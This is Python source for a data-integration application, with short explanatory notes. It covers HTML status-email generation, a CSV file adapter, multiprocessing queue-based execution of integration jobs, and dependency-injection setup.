font-family: Arial,sans-serif;
font-size: 12px;
line-height:10px;
}
.mail-row{
text-align: left;
padding:4px;
font-family: Arial,sans-serif;
font-size: 10px;
line-height:10px;
}
.mail-row-nowrap{
white-space: nowrap;
}
table {
border-collapse: collapse;
width: 100%;
}
th, td {
text-align: left;
padding: 8px;
}
tr:nth-child(even) {background-color: #f2f2f2;}
'''
def mail_html_template(self, body, mail_css=None):
css = mail_css if mail_css is not None else self.default_css
template = f'''
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title></title>
<style>{css}</style>
</head>
<body>
{body}
</body>
</html>
'''
return template
    def get_dict_value(self, source: dict, key):
        if key in source:
            return source[key]
        return ''
    def prepare_table(self, columns: List[dict], rows: List[dict], width):
headers = ''
for column in columns:
column_style = self.get_dict_value(column, 'style')
column_class = self.get_dict_value(column, 'class')
column_value = self.get_dict_value(column, 'value')
headers = headers + f'<th scope="col" style="{column_style}" class="mail-column {column_class}">{column_value}</th>'
bodies = ''
for row in rows:
bodies = bodies + '<tr>'
for data in row['data']:
row_style = self.get_dict_value(data, 'style')
row_class = self.get_dict_value(data, 'class')
row_value = self.get_dict_value(data, 'value')
bodies = bodies + f'<td valign="top" style="{row_style}" class="mail-row {row_class}">{row_value}</td>'
bodies = bodies + '</tr>'
table_width = width if width is not None else '100%'
table = f'''
<table width="{table_width}" cellpadding="0" cellspacing="0" style="min-width:100%;">
<thead>
{headers}
</thead>
<tbody>
{bodies}
</tbody>
</table>
'''
return table
def add_default_contacts(self, operation_contacts):
default_contacts = self.config_service.get_config_by_name("DataOperationDefaultContact")
if default_contacts is not None and default_contacts != '':
default_contacts_emails = default_contacts.split(",")
for default_contact in default_contacts_emails:
if default_contact is not None and default_contact != '':
operation_contacts.append(default_contact)
def send_data_operation_finish_mail(self,
data_operation_job_execution_id,
data_operation_job_execution_status_id,
data_operation_name,
operation_contacts,
execution_table_data,
execution_event_table_data,
execution_integration_table_data
):
        if operation_contacts is None:
            operation_contacts = []
        self.add_default_contacts(operation_contacts=operation_contacts)
        if len(operation_contacts) == 0:
            self.sql_logger.info(f'{data_operation_job_execution_id} mail sending contact not found',
                                 job_id=data_operation_job_execution_id)
            return
        subject = "Execution completed"
if data_operation_job_execution_status_id == 3:
subject = subject + " successfully"
elif data_operation_job_execution_status_id == 4:
subject = subject + " with error"
subject = subject + f": {self.application_config.environment} » {data_operation_name} » {data_operation_job_execution_id}"
execution_table = self.prepare_table(columns=execution_table_data['columns'],
rows=execution_table_data['rows'],
width=800)
# execution_event_table = self.prepare_table(columns=execution_event_table_data['columns'],
# rows=execution_event_table_data['rows'],
# width=400)
execution_integration_table = self.prepare_table(columns=execution_integration_table_data['columns'],
rows=execution_integration_table_data['rows'],
width=None)
# <div style="font-size: 24px;"><b>Data Operation Events</b></div>
# {execution_event_table}
body_content = f'''
<div class="wrapper">
<div style="font-size: 24px;"><b>Data Operation </b></div>
{execution_table}
<div style="font-size: 24px;"><b>Data Operation Integrations</b></div>
{execution_integration_table}
</div>
'''
mail_body = self.mail_html_template(body_content)
try:
self.email_provider.send(operation_contacts, subject, mail_body)
self.sql_logger.error(f"Mail Sent successfully.", job_id=data_operation_job_execution_id)
except Exception as ex:
self.sql_logger.error(f"Error on mail sending. Error:{ex}", job_id=data_operation_job_execution_id)
```
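Note that `prepare_table` consumes `columns` and `rows` as lists of dicts, where each cell dict carries a `value` plus optional `style` and `class` keys. A minimal sketch of the expected shapes, with invented data:
```python
# Minimal illustration of the dict shapes prepare_table consumes; data is invented.
from IocManager import IocManager
from domain.delivery.EmailService import EmailService

email_service = IocManager.injector.get(EmailService)  # assumes IocManager.initialize() already ran

columns = [
    {'value': 'Execution Id'},
    {'value': 'Status', 'class': 'mail-row-nowrap'},
]
rows = [
    {'data': [
        {'value': 17},
        {'value': 'Finished', 'style': 'font-weight:bold;'},
    ]},
]
html_table = email_service.prepare_table(columns=columns, rows=rows, width=800)
html_mail = email_service.mail_html_template(html_table)
print(html_mail)
```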
#### File: integration/services/DataIntegrationConnectionQueueService.py
```python
from injector import inject
from infrastructor.data.DatabaseSessionManager import DatabaseSessionManager
from infrastructor.data.Repository import Repository
from infrastructor.dependency.scopes import IScoped
from models.dao.integration import DataIntegrationConnectionQueue
from models.dao.integration.DataIntegrationConnection import DataIntegrationConnection
from models.viewmodels.integration.CreateDataIntegrationConnectionQueueModel import \
CreateDataIntegrationConnectionQueueModel
class DataIntegrationConnectionQueueService(IScoped):
@inject
def __init__(self,
database_session_manager: DatabaseSessionManager,
):
self.database_session_manager = database_session_manager
self.data_integration_connection_queue_repository: Repository[DataIntegrationConnectionQueue] = \
Repository[DataIntegrationConnectionQueue](database_session_manager)
#######################################################################################
def get_by_id(self, id: int) -> DataIntegrationConnectionQueue:
entity = self.data_integration_connection_queue_repository.first(IsDeleted=0,
Id=id,
)
return entity
def get_by_data_integration_connection_id(self,
data_integration_connection_id: int) -> DataIntegrationConnectionQueue:
entity = self.data_integration_connection_queue_repository.first(IsDeleted=0,
DataIntegrationConnectionId=data_integration_connection_id,
)
return entity
def insert(self,
data_integration_connection: DataIntegrationConnection,
data: CreateDataIntegrationConnectionQueueModel) -> DataIntegrationConnectionQueue:
data_integration_connection_queue = DataIntegrationConnectionQueue(TopicName=data.TopicName,
DataIntegrationConnection=data_integration_connection)
self.data_integration_connection_queue_repository.insert(data_integration_connection_queue)
return data_integration_connection_queue
def update(self,
data_integration_connection: DataIntegrationConnection,
data: CreateDataIntegrationConnectionQueueModel) -> DataIntegrationConnectionQueue:
data_integration_connection_queue = self.get_by_data_integration_connection_id(
data_integration_connection_id=data_integration_connection.Id,
)
data_integration_connection_queue.DataIntegrationConnection = data_integration_connection
data_integration_connection_queue.TopicName = data.TopicName
return data_integration_connection_queue
def delete(self, id: int):
entity = self.get_by_id(id=id)
if entity is not None:
self.data_integration_connection_queue_repository.delete_by_id(id)
```
#### File: adapters/connection/FileAdapter.py
```python
import os
from queue import Queue
from typing import List
from injector import inject
import pandas as pd
from pandas import DataFrame
from domain.operation.execution.services.OperationCacheService import OperationCacheService
from infrastructor.connection.adapters.ConnectionAdapter import ConnectionAdapter
from infrastructor.connection.file.FileProvider import FileProvider
from infrastructor.exceptions.NotSupportedFeatureException import NotSupportedFeatureException
from infrastructor.logging.SqlLogger import SqlLogger
from models.dto.PagingModifier import PagingModifier
class FileAdapter(ConnectionAdapter):
@inject
def __init__(self,
sql_logger: SqlLogger,
file_provider: FileProvider,
operation_cache_service: OperationCacheService,
):
self.operation_cache_service = operation_cache_service
self.sql_logger = sql_logger
self.file_provider = file_provider
def clear_data(self, data_integration_id) -> int:
target_connection = self.operation_cache_service.get_target_connection(
data_integration_id=data_integration_id)
target_context = self.file_provider.get_context(
connection=target_connection.Connection)
data_integration_columns = self.operation_cache_service.get_columns_by_integration_id(
data_integration_id=data_integration_id)
file_path = os.path.join(target_connection.File.Folder, target_connection.File.FileName)
if target_connection.File.Csv.HasHeader:
if target_connection.File.Csv.Header is not None and target_connection.File.Csv.Header != '':
headers = target_connection.File.Csv.Header.split(target_connection.File.Csv.Separator)
else:
headers = [(data_integration_column.TargetColumnName) for data_integration_column in
data_integration_columns]
truncate_affected_rowcount = target_context.recreate_file(
file=file_path, headers=headers,
separator=target_connection.File.Csv.Separator)
else:
truncate_affected_rowcount = target_context.delete_file(
file=file_path)
return truncate_affected_rowcount
def get_source_data_count(self, data_integration_id) -> int:
return -1
def start_source_data_operation(self,
data_integration_id: int,
data_operation_job_execution_integration_id: int,
limit: int,
process_count: int,
data_queue: Queue,
data_result_queue: Queue):
source_connection = self.operation_cache_service.get_source_connection(
data_integration_id=data_integration_id)
source_context = self.file_provider.get_context(connection=source_connection.Connection)
has_header = None
if source_connection.File.Csv.HasHeader:
has_header = 0
headers = None
separator = source_connection.File.Csv.Separator
if source_connection.File.Csv.Header is not None and source_connection.File.Csv.Header != '':
headers = source_connection.File.Csv.Header.split(separator)
if source_connection.File.FileName is not None and source_connection.File.FileName != '':
file_path = source_context.get_file_path(folder_name=source_connection.File.Folder,
file_name=source_connection.File.FileName)
source_context.get_unpredicted_data(file=file_path,
names=headers,
header=has_header,
separator=separator,
limit=limit,
process_count=process_count,
data_queue=data_queue,
result_queue=data_result_queue)
else:
csv_files = source_context.get_all_files(folder_name=source_connection.File.Folder, file_regex='(.*csv$)')
for csv_file in csv_files:
self.sql_logger.info(f"file read started. FilePath:{csv_file} ")
source_context.get_unpredicted_data(file=csv_file,
names=headers,
header=has_header,
separator=separator,
limit=limit,
process_count=process_count,
data_queue=data_queue,
result_queue=data_result_queue)
def get_source_data(self, data_integration_id: int, paging_modifier: PagingModifier) -> DataFrame:
source_connection = self.operation_cache_service.get_source_connection(
data_integration_id=data_integration_id)
source_context = self.file_provider.get_context(connection=source_connection.Connection)
data_integration_columns = self.operation_cache_service.get_columns_by_integration_id(
data_integration_id=data_integration_id)
has_header = None
if source_connection.File.Csv.HasHeader:
has_header = 0
headers = None
if source_connection.File.Csv.Header is not None and source_connection.File.Csv.Header != '':
headers = source_connection.File.Csv.Header.split(source_connection.File.Csv.Separator)
file_path = os.path.join(source_connection.File.Folder, source_connection.File.FileName)
        read_data = source_context.get_data(file=file_path,
names=headers,
header=has_header,
start=paging_modifier.Start,
limit=paging_modifier.Limit,
separator=source_connection.File.Csv.Separator)
column_names = [(data_integration_column.SourceColumnName) for data_integration_column in
data_integration_columns]
        data = read_data[column_names]
replaced_data = data.where(pd.notnull(data), None)
return replaced_data.values.tolist()
def prepare_insert_row(self, data, columns):
insert_rows = []
for extracted_data in data:
row = []
for column in columns:
column_data = extracted_data[column]
row.append(column_data)
insert_rows.append(tuple(row))
return insert_rows
def prepare_data(self, data_integration_id: int, source_data: DataFrame) -> List[any]:
data_integration_columns = self.operation_cache_service.get_columns_by_integration_id(
data_integration_id=data_integration_id)
source_columns = [(data_integration_column.SourceColumnName) for data_integration_column in
data_integration_columns]
if isinstance(source_data, pd.DataFrame):
data = source_data[source_columns]
prepared_data = data.values.tolist()
else:
prepared_data = self.prepare_insert_row(data=source_data, columns=source_columns)
return prepared_data
def write_target_data(self, data_integration_id: int, prepared_data: List[any], ) -> int:
target_connection = self.operation_cache_service.get_target_connection(
data_integration_id=data_integration_id)
target_context = self.file_provider.get_context(connection=target_connection.Connection)
df = pd.DataFrame(prepared_data)
data = df.where(pd.notnull(df), None)
file_path = os.path.join(target_connection.File.Folder, target_connection.File.FileName)
affected_row_count = target_context.write_to_file(file=file_path,
data=data,
separator=target_connection.File.Csv.Separator)
return affected_row_count
def do_target_operation(self, data_integration_id: int) -> int:
raise NotSupportedFeatureException("File Target Operation")
```
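`prepare_data` covers two source shapes: `DataFrame` input is reduced by column selection plus `values.tolist()`, while row-dict input goes through `prepare_insert_row`, which picks the mapped source columns and emits tuples. The same conversion in a standalone, runnable form with invented data:
```python
# Standalone illustration of the prepare_insert_row conversion; data is invented.
rows = [
    {'Id': 1, 'Name': 'alpha', 'Ignored': True},
    {'Id': 2, 'Name': 'beta', 'Ignored': False},
]
columns = ['Id', 'Name']  # stands in for the mapped SourceColumnName list

insert_rows = []
for extracted_data in rows:
    # keep only the mapped columns, in mapping order, as an insert-ready tuple
    insert_rows.append(tuple(extracted_data[column] for column in columns))

print(insert_rows)  # [(1, 'alpha'), (2, 'beta')]
```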
#### File: execution/processes/ExecuteIntegrationProcess.py
```python
import multiprocessing
import traceback
from queue import Queue
from time import time
from injector import inject
from pandas import DataFrame, notnull
import pandas as pd
from domain.operation.execution.services.OperationCacheService import OperationCacheService
from infrastructor.data.decorators.TransactionHandler import transaction_handler
from infrastructor.multi_processing.ProcessManager import ProcessManager
from domain.operation.execution.services.IntegrationExecutionService import IntegrationExecutionService
from IocManager import IocManager
from infrastructor.connection.models.DataQueueTask import DataQueueTask
from infrastructor.dependency.scopes import IScoped
from infrastructor.logging.SqlLogger import SqlLogger
from models.dto.PagingModifier import PagingModifier
class ExecuteIntegrationProcess(IScoped):
@inject
def __init__(self,
sql_logger: SqlLogger,
operation_cache_service: OperationCacheService,
integration_execution_service: IntegrationExecutionService):
self.operation_cache_service = operation_cache_service
self.integration_execution_service = integration_execution_service
self.sql_logger = sql_logger
@staticmethod
def start_source_data_process(sub_process_id,
data_integration_id: int,
data_operation_job_execution_id: int,
data_operation_job_execution_integration_id: int,
limit: int,
process_count: int,
data_queue: Queue,
data_result_queue: Queue):
return IocManager.injector.get(ExecuteIntegrationProcess).start_source_data_operation(
sub_process_id=sub_process_id,
data_integration_id=data_integration_id,
data_operation_job_execution_id=data_operation_job_execution_id,
data_operation_job_execution_integration_id=data_operation_job_execution_integration_id,
limit=limit,
process_count=process_count,
data_queue=data_queue,
data_result_queue=data_result_queue,
)
@transaction_handler
def start_source_data_operation(self, sub_process_id,
data_integration_id: int,
data_operation_job_execution_id: int,
data_operation_job_execution_integration_id: int,
limit: int,
process_count: int,
data_queue: Queue,
data_result_queue: Queue):
self.operation_cache_service.create_data_integration(data_integration_id=data_integration_id)
self.sql_logger.info(f"Source Data started on process. SubProcessId: {sub_process_id}",
job_id=data_operation_job_execution_id)
try:
self.integration_execution_service.start_source_data_operation(
data_integration_id=data_integration_id,
data_operation_job_execution_integration_id=data_operation_job_execution_integration_id,
limit=limit,
process_count=process_count,
data_queue=data_queue,
data_result_queue=data_result_queue)
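            # enqueue one finish sentinel per consumer process so every worker can exit its loop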
for i in range(process_count):
data_queue_finish_task = DataQueueTask(IsFinished=True)
data_queue.put(data_queue_finish_task)
except Exception as ex:
for i in range(process_count):
data_queue_error_task = DataQueueTask(IsFinished=True, Traceback=traceback.format_exc(), Exception=ex)
data_queue.put(data_queue_error_task)
raise
@staticmethod
def start_execute_data_process(sub_process_id,
data_integration_id: int,
data_operation_job_execution_id: int,
data_operation_job_execution_integration_id: int,
data_queue: Queue,
data_result_queue: Queue) -> int:
return IocManager.injector.get(ExecuteIntegrationProcess).start_execute_data_operation(
sub_process_id=sub_process_id,
data_integration_id=data_integration_id,
data_operation_job_execution_id=data_operation_job_execution_id,
data_operation_job_execution_integration_id=data_operation_job_execution_integration_id,
data_queue=data_queue,
data_result_queue=data_result_queue,
)
@transaction_handler
def start_execute_data_operation_on_process(self,
sub_process_id: int,
data_integration_id: int,
data_operation_job_execution_id: int,
data_operation_job_execution_integration_id: int,
data_queue: Queue,
data_result_queue: Queue) -> int:
return IocManager.injector.get(ExecuteIntegrationProcess).start_execute_data_operation(
sub_process_id=sub_process_id,
data_integration_id=data_integration_id,
data_operation_job_execution_id=data_operation_job_execution_id,
data_operation_job_execution_integration_id=data_operation_job_execution_integration_id,
data_queue=data_queue,
data_result_queue=data_result_queue,
)
def start_execute_data_operation(self,
sub_process_id: int,
data_integration_id: int,
data_operation_job_execution_id: int,
data_operation_job_execution_integration_id: int,
data_queue: Queue,
data_result_queue: Queue) -> int:
self.operation_cache_service.create_data_integration(data_integration_id=data_integration_id)
total_row_count = 0
try:
while True:
data_task: DataQueueTask = data_queue.get()
if data_task.IsFinished:
if data_task.Exception is not None:
exc = Exception(data_task.Traceback + '\n' + str(data_task.Exception))
raise exc
self.sql_logger.info(f"{sub_process_id} process tasks finished",
job_id=data_operation_job_execution_id)
return total_row_count
else:
start = time()
data = data_task.Data
paging_modifier = PagingModifier(Id=data_task.Id, End=data_task.End, Start=data_task.Start,
Limit=data_task.Limit)
if data_task.IsDataFrame and data is not None:
source_data_json = data_task.Data
data: DataFrame = DataFrame(source_data_json)
data_count = 0
if data is None:
self.sql_logger.info(
f"{sub_process_id}-{data_task.Message}:{data_task.Id}-{data_task.Start}-{data_task.End} process got a new task",
job_id=data_operation_job_execution_id)
data_count = self.integration_execution_service.start_execute_integration(
data_integration_id=data_integration_id,
data_operation_job_execution_id=data_operation_job_execution_id,
data_operation_job_execution_integration_id=data_operation_job_execution_integration_id,
paging_modifier=paging_modifier,
source_data=data)
elif data is not None and len(data) > 0:
if data_task.IsDataFrame and data_task.DataTypes is not None:
source_data = data.astype(dtype=data_task.DataTypes)
else:
source_data = data
if data_task.IsDataFrame:
                            source_data = source_data.where(notnull(source_data), None)
source_data = source_data.replace({pd.NaT: None})
self.sql_logger.info(
f"{sub_process_id}-{data_task.Message}:{data_task.Id}-{data_task.Start}-{data_task.End} process got a new task",
job_id=data_operation_job_execution_id)
data_count = self.integration_execution_service.start_execute_integration(
data_integration_id=data_integration_id,
data_operation_job_execution_id=data_operation_job_execution_id,
data_operation_job_execution_integration_id=data_operation_job_execution_integration_id,
paging_modifier=paging_modifier,
source_data=source_data)
else:
self.sql_logger.info(
f"{sub_process_id}-{data_task.Message}:{data_task.Id}-{data_task.Start}-{data_task.End} process got an empty task",
job_id=data_operation_job_execution_id)
total_row_count = total_row_count + data_count
end = time()
self.sql_logger.info(
f"{sub_process_id}-{data_task.Message}:{data_task.Id}-{data_task.Start}-{data_task.End} process finished task. time:{end - start}",
job_id=data_operation_job_execution_id)
data_task.IsProcessed = True
data_result_queue.put(True)
return total_row_count
except Exception as ex:
data_result_queue.put(False)
raise
def start_source_data_subprocess(self,
source_data_process_manager: ProcessManager,
data_integration_id: int,
data_operation_job_execution_id: int,
data_operation_job_execution_integration_id: int,
limit: int,
process_count: int,
data_queue: Queue,
data_result_queue: Queue):
source_data_kwargs = {
"data_integration_id": data_integration_id,
"data_operation_job_execution_id": data_operation_job_execution_id,
"data_operation_job_execution_integration_id": data_operation_job_execution_integration_id,
"limit": limit,
"process_count": process_count,
"data_queue": data_queue,
"data_result_queue": data_result_queue,
}
source_data_process_manager.start_processes(
process_count=1,
target_method=self.start_source_data_process,
kwargs=source_data_kwargs)
def start_execute_data_subprocess(self, execute_data_process_manager: ProcessManager,
process_count: int,
data_integration_id: int,
data_operation_job_execution_id: int,
data_operation_job_execution_integration_id: int,
data_queue: Queue,
data_result_queue: Queue) -> int:
total_row_count = 0
execute_data_kwargs = {
"data_integration_id": data_integration_id,
"data_operation_job_execution_id": data_operation_job_execution_id,
"data_operation_job_execution_integration_id": data_operation_job_execution_integration_id,
"data_queue": data_queue,
"data_result_queue": data_result_queue,
}
execute_data_process_manager.start_processes(
process_count=process_count,
target_method=self.start_execute_data_process,
kwargs=execute_data_kwargs)
execute_data_process_results = execute_data_process_manager.get_results()
for result in execute_data_process_results:
if result.Exception is not None:
raise result.Exception
if result.Result is not None:
total_row_count = total_row_count + result.Result
return total_row_count
def start_integration_execution(self,
data_operation_job_execution_id: int,
data_operation_job_execution_integration_id: int,
data_operation_integration_id: int) -> int:
try:
data_operation_integration = self.operation_cache_service.get_data_operation_integration_by_id(
data_operation_integration_id=data_operation_integration_id)
if data_operation_integration.ProcessCount is not None and data_operation_integration.ProcessCount >= 1:
process_count = data_operation_integration.ProcessCount
else:
process_count = 1
data_integration_id = data_operation_integration.DataIntegrationId
limit = data_operation_integration.Limit
try:
manager = multiprocessing.Manager()
source_data_process_manager = ProcessManager()
execute_data_process_manager = ProcessManager()
data_queue = manager.Queue()
data_result_queue = manager.Queue()
self.start_source_data_subprocess(source_data_process_manager=source_data_process_manager,
data_integration_id=data_integration_id,
data_operation_job_execution_id=data_operation_job_execution_id,
data_operation_job_execution_integration_id=data_operation_job_execution_integration_id,
limit=limit,
process_count=process_count, data_queue=data_queue,
data_result_queue=data_result_queue)
if process_count > 1:
total_row_count = self.start_execute_data_subprocess(
execute_data_process_manager=execute_data_process_manager,
process_count=process_count,
data_integration_id=data_integration_id,
data_operation_job_execution_id=data_operation_job_execution_id,
data_operation_job_execution_integration_id=data_operation_job_execution_integration_id,
data_queue=data_queue,
data_result_queue=data_result_queue)
else:
total_row_count = self.start_execute_data_operation(sub_process_id=0,
data_integration_id=data_integration_id,
data_operation_job_execution_id=data_operation_job_execution_id,
data_operation_job_execution_integration_id=data_operation_job_execution_integration_id,
data_queue=data_queue,
data_result_queue=data_result_queue)
# total_row_count = self.integration_execution_service.start_integration(
# data_integration_id=data_integration_id,
# limit=limit,
# data_operation_job_execution_integration_id=data_operation_job_execution_integration_id)
finally:
manager.shutdown()
del source_data_process_manager
del execute_data_process_manager
return total_row_count
except Exception as ex:
self.sql_logger.error(f"Integration getting error.Error:{ex}", job_id=data_operation_job_execution_id)
raise
```
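The orchestration above follows a classic fan-out pattern: one producer fills a `multiprocessing.Manager` queue, `process_count` consumers drain it, and one `IsFinished` sentinel per consumer shuts the loop down. The same pattern in miniature, stripped of the domain objects (all names here are illustrative):
```python
# Minimal standalone version of the producer/consumer pattern used above.
import multiprocessing


def consumer(data_queue, result_queue):
    total = 0
    while True:
        task = data_queue.get()
        if task is None:  # finish sentinel, one per consumer
            result_queue.put(total)
            return
        total += task  # stand-in for start_execute_integration


if __name__ == '__main__':
    process_count = 2
    manager = multiprocessing.Manager()
    data_queue = manager.Queue()
    result_queue = manager.Queue()
    workers = [multiprocessing.Process(target=consumer, args=(data_queue, result_queue))
               for _ in range(process_count)]
    for worker in workers:
        worker.start()
    for chunk in range(10):
        data_queue.put(chunk)
    for _ in range(process_count):  # one sentinel per consumer, as in the source
        data_queue.put(None)
    for worker in workers:
        worker.join()
    print(sum(result_queue.get() for _ in range(process_count)))  # 45
```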
#### File: operation/services/DataOperationJobExecutionService.py
```python
from datetime import datetime
from typing import List
from injector import inject
from domain.delivery.EmailService import EmailService
from infrastructor.data.RepositoryProvider import RepositoryProvider
from infrastructor.data.decorators.TransactionHandler import transaction_handler
from infrastructor.dependency.scopes import IScoped
from infrastructor.logging.SqlLogger import SqlLogger
from models.dao.common import OperationEvent
from models.dao.common.Status import Status
from models.dao.integration import DataIntegrationConnection
from models.dao.operation import DataOperationJobExecution, DataOperationJobExecutionIntegration, \
DataOperationIntegration
from models.dao.operation.DataOperationJobExecutionEvent import DataOperationJobExecutionEvent
class DataOperationJobExecutionService(IScoped):
@inject
def __init__(self,
repository_provider: RepositoryProvider,
sql_logger: SqlLogger,
email_service: EmailService
):
self.repository_provider = repository_provider
self.data_operation_job_execution_repository = repository_provider.get(DataOperationJobExecution)
self.data_operation_job_execution_integration_repository = repository_provider.get(
DataOperationJobExecutionIntegration)
self.status_repository = repository_provider.get(Status)
self.operation_event_repository = repository_provider.get(OperationEvent)
self.data_operation_job_execution_event_repository = repository_provider.get(DataOperationJobExecutionEvent)
self.data_integration_connection_repository = repository_provider.get(DataIntegrationConnection)
self.email_service = email_service
self.sql_logger: SqlLogger = sql_logger
def update_status(self, data_operation_job_execution_id: int = None,
status_id: int = None, is_finished: bool = False):
data_operation_job_execution = self.data_operation_job_execution_repository.first(
Id=data_operation_job_execution_id)
status = self.status_repository.first(Id=status_id)
if is_finished:
data_operation_job_execution.EndDate = datetime.now()
data_operation_job_execution.Status = status
self.repository_provider.commit()
return data_operation_job_execution
def create_event(self, data_operation_execution_id,
event_code) -> DataOperationJobExecutionEvent:
data_operation_job_execution = self.data_operation_job_execution_repository.first(
Id=data_operation_execution_id)
operation_event = self.operation_event_repository.first(Code=event_code)
data_operation_job_execution_event = DataOperationJobExecutionEvent(
EventDate=datetime.now(),
DataOperationJobExecution=data_operation_job_execution,
Event=operation_event)
self.data_operation_job_execution_event_repository.insert(data_operation_job_execution_event)
self.repository_provider.commit()
return data_operation_job_execution_event
def prepare_execution_table_data(self, data_operation_job_execution_id):
data_operation_job_execution = self.data_operation_job_execution_repository.first(
Id=data_operation_job_execution_id)
columns = [
{'value': 'Execution Id'},
{'value': 'Name'},
{'value': 'Status'},
{'value': 'Execution Start Date'},
{'value': 'Execution End Date'}
]
rows = [
{
'data':
[
{'value': data_operation_job_execution.Id},
{
'value': f'{data_operation_job_execution.DataOperationJob.DataOperation.Name} ({data_operation_job_execution.DataOperationJob.DataOperation.Id})'},
{'value': data_operation_job_execution.Status.Description},
{'value': data_operation_job_execution.StartDate.strftime('%d.%m.%Y-%H:%M:%S.%f')[:-3],
'class': 'mail-row-nowrap'},
{'value': data_operation_job_execution.EndDate.strftime('%d.%m.%Y-%H:%M:%S.%f')[:-3],
'class': 'mail-row-nowrap'}
]
}
]
return {'columns': columns, 'rows': rows}
def prepare_execution_event_table_data(self, data_operation_job_execution_id):
data_operation_job_execution = self.data_operation_job_execution_repository.first(
Id=data_operation_job_execution_id)
job_execution_events: List[
DataOperationJobExecutionEvent] = data_operation_job_execution.DataOperationJobExecutionEvents
columns = [
{'value': 'Event Description'},
{'value': 'Event Date'}
]
rows = []
for job_execution_event in job_execution_events:
execution_operation_event: OperationEvent = job_execution_event.Event
row = {
"data": [
{'value': execution_operation_event.Description},
{'value': job_execution_event.EventDate.strftime('%d.%m.%Y-%H:%M:%S.%f')[:-3],
'class': 'mail-row-nowrap'}
]
}
rows.append(row)
return {'columns': columns, 'rows': rows}
def prepare_execution_integration_table_data(self, data_operation_job_execution_id):
job_execution_integrations_query = self.repository_provider.create().session.query(
DataOperationJobExecutionIntegration, DataOperationIntegration
) \
.filter(DataOperationJobExecutionIntegration.DataOperationIntegrationId == DataOperationIntegration.Id) \
.filter(DataOperationJobExecutionIntegration.DataOperationJobExecutionId == data_operation_job_execution_id) \
.order_by(DataOperationIntegration.Order)
job_execution_integrations = job_execution_integrations_query.all()
columns = [
{'value': 'Order'},
{'value': 'Code'},
{'value': 'Source'},
{'value': 'Target'},
{'value': 'Status'},
{'value': 'Start Date'},
# {'value': 'End Date'},
{'value': 'Limit'},
{'value': 'Process Count'},
{'value': 'Source Data Count'},
{'value': 'Affected Row Count'},
{'value': 'Log'}
]
rows = []
for job_execution_integration_data in job_execution_integrations:
job_execution_integration = job_execution_integration_data.DataOperationJobExecutionIntegration
data_integration_id = job_execution_integration.DataOperationIntegration.DataIntegration.Id
source_connection = self.data_integration_connection_repository.table \
.filter(DataIntegrationConnection.IsDeleted == 0) \
.filter(DataIntegrationConnection.DataIntegrationId == data_integration_id) \
.filter(DataIntegrationConnection.SourceOrTarget == 0) \
.one_or_none()
target_connection = self.data_integration_connection_repository.table \
.filter(DataIntegrationConnection.IsDeleted == 0) \
.filter(DataIntegrationConnection.DataIntegrationId == data_integration_id) \
.filter(DataIntegrationConnection.SourceOrTarget == 1) \
.one_or_none()
source_data_count = 0
if job_execution_integration.SourceDataCount is not None and job_execution_integration.SourceDataCount > 0:
source_data_count = job_execution_integration.SourceDataCount
total_affected_row_count = 0
for event in job_execution_integration.DataOperationJobExecutionIntegrationEvents:
if event.AffectedRowCount is not None and event.AffectedRowCount > 0:
total_affected_row_count = total_affected_row_count + event.AffectedRowCount
source_connection_name = source_connection.Connection.Name if source_connection is not None else ''
target_connection_name = target_connection.Connection.Name if target_connection is not None else ''
row = {
"data": [
{'value': job_execution_integration.DataOperationIntegration.Order},
{'value': job_execution_integration.DataOperationIntegration.DataIntegration.Code},
{'value': source_connection_name},
{'value': target_connection_name},
{'value': job_execution_integration.Status.Description},
                    {'value': job_execution_integration.StartDate.strftime('%d.%m.%Y-%H:%M:%S.%f')[:-3],
'class': 'mail-row-nowrap'
},
# {'value': job_execution_integration.EndDate.strftime('%d.%m.%Y-%H:%M:%S.%f')[:-3],
# },
{'value': job_execution_integration.Limit},
{'value': job_execution_integration.ProcessCount},
{'value': source_data_count},
{'value': total_affected_row_count},
{'value': job_execution_integration.Log}
]
}
rows.append(row)
return {'columns': columns, 'rows': rows}
@transaction_handler
def send_data_operation_finish_mail(self, data_operation_job_execution_id):
data_operation_job_execution = self.data_operation_job_execution_repository.first(
Id=data_operation_job_execution_id)
if data_operation_job_execution is None:
self.sql_logger.info(f'{data_operation_job_execution_id} mail sending execution not found',
job_id=data_operation_job_execution_id)
return
operation_contacts = []
for contact in data_operation_job_execution.DataOperationJob.DataOperation.Contacts:
if contact.IsDeleted == 0:
operation_contacts.append(contact.Email)
data_operation_name = data_operation_job_execution.DataOperationJob.DataOperation.Name
execution_table_data = self.prepare_execution_table_data(
data_operation_job_execution_id=data_operation_job_execution_id)
execution_event_table_data = self.prepare_execution_event_table_data(
data_operation_job_execution_id=data_operation_job_execution_id)
execution_integration_table_data = self.prepare_execution_integration_table_data(
data_operation_job_execution_id=data_operation_job_execution_id)
self.email_service.send_data_operation_finish_mail(
data_operation_job_execution_id=data_operation_job_execution_id,
data_operation_job_execution_status_id=data_operation_job_execution.StatusId,
data_operation_name=data_operation_name,
operation_contacts=operation_contacts,
execution_table_data=execution_table_data,
execution_event_table_data=execution_event_table_data,
execution_integration_table_data=execution_integration_table_data
)
```
#### File: src/process/IocManager.py
```python
import os
import sys
from multiprocessing.process import current_process
from injector import singleton, Injector, threadlocal, Binder
from sqlalchemy import MetaData
from sqlalchemy.ext.declarative import declarative_base
from infrastructor.dependency.scopes import ISingleton, IScoped
from infrastructor.logging.ConsoleLogger import ConsoleLogger
from infrastructor.utils.ConfigManager import ConfigManager
from infrastructor.utils.Utils import Utils
from models.configs.ApplicationConfig import ApplicationConfig
from models.configs.DatabaseConfig import DatabaseConfig
from models.configs.ProcessRpcServerConfig import ProcessRpcServerConfig
class IocManager:
binder: Binder = None
process_service = None
    config_manager: ConfigManager = None
injector: Injector = None
Base = declarative_base(metadata=MetaData(schema='Common'))
@staticmethod
def initialize():
root_directory = os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(__file__))))
IocManager.configure_startup(root_directory)
@staticmethod
def set_process_service(process_service=None):
IocManager.process_service = process_service
# wrapper required for dependency
@staticmethod
def configure_startup(root_directory):
# Importing all modules for dependency
sys.path.append(root_directory)
folders = Utils.find_sub_folders(root_directory)
module_list, module_attr_list = Utils.get_modules(folders)
# Configuration initialize
IocManager.config_manager = ConfigManager(root_directory)
IocManager.set_database_application_name()
IocManager.process_info()
IocManager.injector = Injector(IocManager.configure)
